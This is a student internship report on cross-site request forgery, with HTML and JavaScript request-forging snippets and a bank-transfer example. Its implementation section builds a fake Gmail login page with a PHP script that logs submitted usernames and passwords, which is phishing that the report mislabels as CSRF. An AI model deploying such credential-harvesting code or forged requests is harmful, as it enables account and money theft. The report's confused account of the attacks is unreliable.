Cross-Site Request Forgery

Transcription

1 Cross-Site Request Forgery Venkateshwar Reddy S, MBA (Banking Technology), Pondicherry Central University, Puducherry, Project guide: Dr. N.P. Dhavale, Deputy General Manager, INFINET Department, Institute of Development and Research in Banking Technology (IDRBT) Road No. 1, Castle Hills, Masab Tank, Hyderabad

2 CONTENTS Certificate... 3 Declaration... 4 Abstract Introduction CSRF Definition CSRF Characteristics Common ways to perform a CSRF attack CSRF Example Process and methodology Requirements Local host server: XAMPP Web Hosting site: Freezoka.net CSRF attacking process CSRF attacking methodology Implementation Attacking sites To steal Gmail usernames and passwords Attack Vectors Significant problem Limitations Conclusion Reference

3 CERTIFICATE This is to certify that project report titled Cross-site request forgery submitted by Venkateshwar Reddy S of MBA(Banking Technology)1 st year, Pondicherry Central University- Puducherry, is record of a Bonafide work carried out by her under my guidance during the period 14 th may 2011 to 23 rd July 2011 at Institute of Development and Research in Banking Technology, Hyderabad. The project work is a research study, which has been successfully completed as per the set objectives. Dr. N.P. Dhavale, Deputy General Manager, INFINET Department, IDRBT, Hyderabad. 3

4 DECLARATION I declare that the summer internship project report titled Cross-site request forgery is my own work conducted under the supervision of Prof. N P Dhavale at the Institute of Development and Research in Banking Technology, Hyderabad. I have put in 65 days of my attendance with my supervisor at IDRBT and have been awarded project fellowship. I further declare that to the best of my knowledge, the report does not contain any part of any work which has been submitted for the award of any degree either in this institute or any other institute without proper citation. Venkateshwar Reddy S, MBA(Banking Technology)1 st year, Pondicherry Central University-Puducherry. 4

5 Abstract This document explores Cross-site request forgery attack which is a type of malicious exploit of a website in which legitimate commands are sent from a user to a website without his permission. CSRF exploits is the trust that a site is in a user's browser. It is also known as a oneclick attack or session riding. The most popular ways to execute CSRF attacks is by using a HTML image tag, or JavaScript image object. The attack works by including a link or script in a page that accesses a site to which the user is known (or is supposed) to have been authenticated. Typically an attacker will embed these into an or website so when the user loads the page or , they perform a web request to any URL of the attackers liking. Contrary to Cross-Site Scripting (XSS) which exploits the trust a user has for a particular site, CSRF exploits the trust that site has for a particular user. 5

6 1. Introduction 1.1 CSRF Definition: Cross-site request forgery (CSRF or XSRF) is a type of malicious exploit of a website in which legitimate commands are sent from a user to a website without his permission. CSRF exploits is the trust that a site is in a user's browser. It is also known as a one-click attack or session riding. Suppose a user login in a website A. After the authentication process, website provides a session id to the user and it'll expire after the logout process. But this session id will exists between login to logout period. In mean time all the request sent from victims browser to the website A will be recognized as a legitimate requests of this user because of this active valid session id which is stored as cookies and authenticate the user. This is called the trust of a website on the user's browser. If the browser has valid session keys, it means all the request sent by this browser is valid an belong to this user. Here comes the attacker. He posted a link on a website or forum which would send a http request to website A. User's session is active so this http request would be recognized as a request sent by this user and website would act according to this request. 1.2 CSRF Characteristics: The following characteristics are common to CSRF: Involve sites that rely on a user's identity Exploit the site's trust in that identity Trick the user's browser into sending HTTP requests to a target site Involve HTTP requests that have side effects At risk are web applications that perform actions based on input from trusted and authenticated users without requiring the user to authorize the specific action. A user who is authenticated by a cookie saved in the user's web browser could unknowingly send an HTTP request to a site that trusts the user and thereby causes an unwanted action. CSRF attacks using image tags are often made from Internet forums, where users are allowed to post images but not JavaScript. 6

7 1.3 Common ways to perform a CSRF attack: The most popular ways to execute CSRF attacks is by using a HTML image tag, or JavaScript image object. Typically an attacker will embed these into an or website so when the user loads the page or , they perform a web request to any URL of the attackers liking. Below is a list of the common ways that an attacker may try sending a request. HTML Methods IMG SRC <img src=" SCRIPT SRC <script src=" IFRAME SRC <iframe src=" JavaScript Methods 'Image' Object <script> var foo = new Image(); foo.src = " </script> 'XMLHTTP' Object IE <script> var post_data = 'name=value'; var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); xmlhttp.open("post", ' true); xmlhttp.onreadystatechange = function () { if (xmlhttp.readystate == 4) { alert(xmlhttp.responsetext); } }; xmlhttp.send(post_data); </script> 7

8 1.4 CSRF Example: The attack works by including a link or script in a page that accesses a site to which the user is known (or is supposed) to have been authenticated. The website A is the website of user's bank. User login into website. Website has a form for transfer of money to another account. Suppose this for action generate this type of get request. <img src=" "> Attacker know the format of the form so he send the link in an image tag (as give below) to the user.. <img src=" Browsers do not restrict the IMG tag to specific image types IMG tag could point to a page instead of an image. If user (bob-in case of given url) will click on the image with running session then it's money will be transferred to attacker's(alice-in case of url) by the bank. 8

9 We can see this process in figures. Web Browser has established an authenticated session with the Trusted Site. Trusted Action should only be performed when the Web Browser makes the request over the authenticated session. Web Browser attempts to perform a Trusted Action. The Trusted Site confirms that the Web Browser is authenticated and allows the action to be performed. The Attacking Site causes the browser to send a request to the Trusted Site. The Trusted Site sees a valid, authenticated request from the Web Browser and performs the Trusted Action. 9

10 2. Process and methodology 2.1 Requirements: Source code: Operating System: Local host server: Web Hosting site: HTML, Java script, PHP Microsoft Windows XP XAMPP control panel (Apache Friends edition) Freezoka.net Local host server: XAMPP XAMPP is a free and open source cross-platform web server solution stack package, consisting mainly of the Apache HTTP Server, MySQL database, and interpreters for scripts written in the PHP and Perl programming languages.xampp is available for Microsoft Windows, Linux, Solaris, and Mac OS X, and is mainly used for web development projects. This software is useful while you are creating dynamic WebPages using programming languages like PHP, JSP, Servlets. XAMPP Features XAMPP requires only one.zip,.tar or.exe file to be downloaded and run, and little or no configuration of the various components that make up the web server is required. XAMPP is regularly updated to incorporate the latest releases of Apache/MySQL/PHP and Perl. It also comes with a number of other modules including OpenSSL and phpmyadmin. Installing XAMPP takes less time than installing each of its components separately. Selfcontained, multiple instances of XAMPP can exist on a single computer, and any given instance can be copied from one computer to another. It is offered in both a full, standard version and a smaller version. XAMPP Use Officially, XAMPP's designers intended it for use only as a development tool, to allow website designers and programmers to test their work on their own computers without any access to the Internet. To make this as easy as possible, many important security features are disabled by default. In practice, however, XAMPP is sometimes used to actually serve web pages on the World Wide Web. A special tool is provided to password-protect the most important parts of the package. 10

11 XAMPP also provides support for creating and manipulating databases in MySQL and SQLite among others. Once XAMPP is installed you can treat your local host like a remote host by connecting using an FTP client. Using a program like FileZilla has many advantages when installing a content management system (CMS) like Joomla. You can also connect to local host via FTP with your editor. The default FTP user "new user", the default FTP password is "wampp" Web Hosting site: Freezoka.net The following steps to upload our files in Web Hosting site: Freezoka.net First of all you need to download filezilla. It is to Download link( Then you need to get your Login information: Login to your Freezoka account, and go to "control panel". scroll down to the "Files" section and click on "FTP Access" Now write down the details you see 11

12 Now Open Filezilla, and enter your details and click on quick connect. Now the Left list represents your local computer. and the right list represents your FTP server(your website server). Now you double click on public_html in the RIGHT "List. and you should see every file and folder you got on your server(i got a lot of files folders) 12

13 To create a folder/directory, right click in the right list and click "Create directory" A box should popup asking for the folder name, write"public_html/foldername" and click OK You can double click on the folder to enter it after you clicked OK Uploading and Downloading Upload: simply drag a file from the left list to the right list Download: drag a file from the right list onto the left list Almost the same way as you moves files and folders in Windows (or Linux). do disconnect you can either close the program, press CTRL - D, or click on Server -> Disconnect 13

14 2.2 CSRF attacking process 1) Downloaded and installed 'XAMPP control panel which is local host server. Here is the link: XAMPP download. ( 2) When it installed, open browser and type local host in the address bar. If everything is working properly, you should see the XAMPP main page. 3) The first thing we need to do is to create a folder for our project. Open Windows explorer, and drill down to wherever you installed XAMPP (on Windows it will be installed in your C: drive). Open the subfolder called htdocs and create a new folder called password_test. This becomes our project folder. 4) Next, we are going to create the first of three files that will be placed in this password_test folder A) Password.txt B) Index.php (log in page of website) C) Process_form.php A) Create a text file called password.txt, and type in the following line:qwerty: Save the file and close it. That is the file we will use to check our username and password combinations. 14

15 B) The next file we want to create is the index page, which is the page that PHP defaults to when a project is run. So create a page called index.php, and make sure to save it in the password_test folder. C) Now we have created a file called process_form.php yet, which is the next step.it is simply a text file. 5) After then run our project. If all is working properly, we should see our username and password displayed on the screen. 2.3 CSRF attacking methodology The most popular ways to execute CSRF attacks is by using a HTML image tag, or JavaScript image object. Typically an attacker will embed these into an or website so when the user loads the page or , they perform a web request to any URL of the attackers liking. Below is a list of the common ways that an attacker may try sending a request. HTML Methods IMG SRC <img src=" SCRIPT SRC <script src=" IFRAME SRC <iframe src=" JavaScript Methods 'Image' Object <script> var foo = new Image(); foo.src = " </script> 15

16 3. Implementation 3.1 Attacking sites: Gmail ( Facebook ( Simple Registration form etc To steal Gmail usernames and passwords The following steps are to To steal Gmail usernames and passwords 1) Downloaded and installed XAMPP control panel which is local host server. 2) When it installed, open browser and type local host in the address bar. If everything is working properly, you should see the XAMPP main page. 16

17 3) The first thing we need to do is to create a folder for our project. Open Windows explorer, and drill down to wherever you installed XAMPP (on Windows it will be installed in your C: drive). 17

18 4) Open the subfolder called htdocs and it contains index.html and index.php files which are used to executing our project files 5) Create a new folder called Gmail.com. This becomes our project folder. Create the first of three files that will be placed in this Gmail.com folder A) log.txt B) gmail.html (log in page of website) C) mail.php 18

19 6)Now click on gmail.html and type in the address bar.it will show fake Gmail login page. 7) The mail.php file ccontains the following code <?php header ('Location: '); $handle = fopen("log.txt", "a"); foreach($_post as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); 19

20 ?> fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; Note: $handle = fopen("log.txt", "a"); This command was used to create log.txt file 20

21 8) To execute CSRF attacks is by using the following HTML image tag <form id="gaia_loginform" action="mail.php" method="post" onsubmit="return(gaia_onloginsubmit());" > 21

22 9) After the victim logged the fake gmail page the username and password are stored in log.txt file 22

23 3.2 Attack Vectors User must be logged into Trusted site and visit attacking site If trusted accepts GET requests, then the <img> tag can be used to generate a malicious request If trusted site only accepts POST request,then it is necessary to use a java script to generate a malicious request Can initiate a CSRF by sending a victim an with a link to a malicious Web page Also possible to post malicious code to an online discussion forum to start an attack when a victim reads the posting 3.3 Significant problem Numerous Web sites seem to be vulnerable to CSRF Only standard programming techniques are needed to implement attacks Consequently,CSRF is a Significant problem that all developers need to take seriously 3.3 Limitations Several things have to happen for cross-site request forgery to succeed: 1. The attacker must target either a site that doesn't check the referrer header (which is common) or a victim with a browser or plugin bug that allows referrer spoofing (which is rare). 2. The attacker must find a form submission at the target site, or a URL that has side effects, that does something (e.g., transfers money, or changes the victim's address or password). 3. The attacker must determine the right values for all the form's or URL's inputs; if any of them are required to be secret authentication values or IDs that the attacker can't guess, the attack will fail. 4. The attacker must lure the victim to a Web page with malicious code while the victim is logged in to the target site. Note that the attack is blind; i.e., the attacker can't see what the target website sends back to the victim in response to the forged requests, unless he exploits a cross-site scripting or other bug at the target website. Similarly, the attacker can only target any links or submit any forms that come up after the initial forged request, if those subsequent links or forms are similarly predictable. 23

24 (Multiple targets can be simulated by including multiple images on a page, or by using JavaScript to introduce a delay between clicks.) Given these constraints, an attacker might have difficulty finding logged-in victims or attackable form submissions. On the other hand, attack attempts are easy to mount and invisible to victims, and application designers are less familiar with and prepared for CSRF attacks than they are for, say, password-guessing dictionary attack. 5. Conclusion CSRF attacks are based on a client's trust in a browser. They are performed when a user's browser sends an HTTP request to a site that causes a 'side effect' without the user knowing. Please note that while CSRF attacks commonly are included in image tags, they are not limited to one html element. There are multiple ways to exploit CSRF vulnerability. Converting requests from POST to GET is not necessarily an attack requirement because JavaScript is capable of automatic web-form submission. 6. References Books W.Zeller and E.W. Felten, Cross-site request Forgeries: exploitation and prevention, technical report, Princeton university,2008 Websites

25 25 Cross-Site Request Forgery